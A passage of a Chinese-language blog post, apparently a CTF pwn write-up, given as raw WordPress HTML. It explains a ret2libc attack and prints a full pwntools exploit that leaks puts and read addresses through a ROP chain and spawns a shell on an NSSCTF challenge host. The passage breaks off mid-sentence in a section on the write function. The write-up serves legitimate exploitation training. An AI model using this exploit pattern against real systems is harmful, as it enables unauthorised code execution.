height=\"266\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-23-1024x266.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-156\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5bf9\u4e8e\u8fd9\u4e24\u4e2alibc\u7248\u672c\u5173\u952e\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-24.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"884\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-157\"  sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u5bf9\u6bd4\u53d1\u73b0\u5173\u952e\u5185\u5bb9\u5747\u4e00\u81f4\uff08\u7279\u522b\u662f\u6211\u4eec\u5173\u5fc3\u7684<code>system<\/code>\u51fd\u6570\u548c<code>\/bin\/sh<\/code>\u5b57\u7b26\u4e32)<\/p>\n\n\n\n<p>\u6211\u4eec\u4efb\u9009\u4e00\u4e2a\u4e0b\u8f7d\uff0c\u4e4b\u540e\u901a\u8fc7\u5982\u4e0b\u4ee3\u7801\u5c31\u53ef\u4ee5\u5f97\u5230shell\u4e86\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \n\np = remote(\"node4.anna.nssctf.cn\", 28516)  \nelf = ELF(\".\/pwn (8)\")  \nlibc = ELF(\".\/libc6_2.23-0ubuntu10_amd64.so\")  \n\nputs_plt = elf.plt&#91;'puts'&#93;  \nputs_got = elf.got&#91;'puts'&#93;  \nread_got = elf.got&#91;'read'&#93;  \npop_rdi = 0x400733  \nret = 0x4004c9  \nvuln = 0x40067D  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nputs_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of puts is\", hex(puts_real))  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nread_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of read is\", hex(read_real))  \n\nlibc_base = puts_real - libc.sym&#91;\"puts\"&#93;  \nprint(\"&#91;+&#93; The base address of libc is\", hex(libc_base))  \n\nsystem = libc_base + libc.sym&#91;\"system\"&#93;  \nsh = libc_base + next(libc.search(b\"\/bin\/sh\"))  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(sh) + p64(system) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">node4.anna.nssctf.cn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">28516<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn (8)<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/libc6_2.23-0ubuntu10_amd64.so<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">read_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">read<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400733<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4004c9<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">vuln <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40067D<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of puts is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_real<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">read_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">read_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of read is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">read_real<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc_base <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> puts_real <\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">sym<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The base address of libc is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc_base<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">system <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">sym<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">system<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">next<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">search<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">system<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><code>write<\/code>\u51fd\u6570<\/h3>\n\n\n\n<p><code>write<\/code>\u51fd\u6570\u6709\u4e09\u4e2a\u53c2\u6570\uff0c\u8fd9\u4e09\u4e2a\u53c2\u6570\u5206\u522b\u4f7f\u7528<code>rdi<\/code>\uff0c<code>rsi<\/code>\u548c<code>rdx<\/code>\u4e09\u4e2a\u5bc4\u5b58\u5668\uff0c\u5206\u522b\u5b58\u50a8\u6587\u4ef6\u63cf\u8ff0\u7b26<code>fd<\/code>\uff08\u901a\u5e38\u8bbe\u7f6e\u4e3a1\u8868\u793a\u8f93\u51fa\u6d41\uff09\uff0c\u8981\u8f93\u51fa\u7684\u6570\u636e<code>buf<\/code>\u4ee5\u53ca\u8f93\u51fa\u957f\u5ea6<code>n<\/code><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-25.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-25.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"294\" height=\"93\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-25.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-158\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u5728\u4e00\u822c\u60c5\u51b5\u4e0b\uff0c\u7a0b\u5e8f\u4e2d\u5e76\u4e0d\u4f1a\u521a\u521a\u597d\u540c\u65f6\u5305\u542b<code>pop rdi; retn<\/code>\uff0c<code>pop rsi; retn<\/code>\u4ee5\u53ca<code>pop rdx; 